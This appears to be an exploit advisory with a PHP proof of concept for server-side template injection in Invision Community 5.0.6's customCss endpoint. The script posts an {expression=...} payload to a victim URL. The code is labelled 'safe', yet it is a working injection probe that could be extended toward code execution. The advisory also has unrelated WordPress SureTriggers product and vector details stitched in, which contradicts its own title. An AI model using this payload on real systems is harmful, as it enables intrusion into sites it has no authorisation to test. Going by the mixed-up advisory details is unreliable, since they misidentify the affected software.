📄 Invision Community 5.0.6 customCss Expression Injection

=============================================================================================================================================
    | # Title     : Invision Community 5.0.6 customCss Expression Injection                                                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://invisioncommunity.com/release-notes-v5/                                                                             |
    =============================================================================================================================================
    
    [+] Summary : Expression Injection → Server-Side Template Injection (SSTI)
    
    A vulnerability exists in the `customCss` endpoint where the parameter
    `content` is parsed using `{expression="…"}`
    allowing template expressions to be evaluated.
    
    
    [+] References : ( https://packetstorm.news/files/id/194569/ 	CVE-2025-47916 ) 
    
    [+] Affected Product
     - WordPress Plugin: SureTriggers
     - Version: <= 1.0.78
    
    [+] Vector
    Unauthenticated REST access:
      /wp-json/sure-triggers/v1/automation/action
    
    [+] Research Notes
    The endpoint accepts JSON payloads describing automation tasks.
    In vulnerable versions, no authorization validation is performed
    before processing the request. This POC validates reachability only.
    
    --------------------------------------------------------------------
    ### SAFE PHP POC
    --------------------------------------------------------------------
    <?php
    /*
     * Invision Community 5.0.6 customCss Expression Injection – Safe PoC
     * Author: Indoushka
     */
    
    $target   = "http://victim.com";   // ← ضع الرابط
    $endpoint = $target . "/index.php";
    
    // Safe Payload (No RCE)
    $expr = '{expression="print(\'Indoushka\')"}';
    
    // POST body
    $data = array(
        'app'        => 'core',
        'module'     => 'system',
        'controller' => 'themeeditor',
        'do'         => 'customCss',
        'content'    => $expr
    );
    
    // Send request
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $endpoint);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    // Display server response
    echo "===== Safe PoC Response =====\n";
    echo $response;
    ?>
    
    -------------------
    ### SAVE & RUN 
    -------------------
    
    1. Save as:
       invision_safe_poc.php
    
    2. Run:
       php invision_safe_poc.php
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================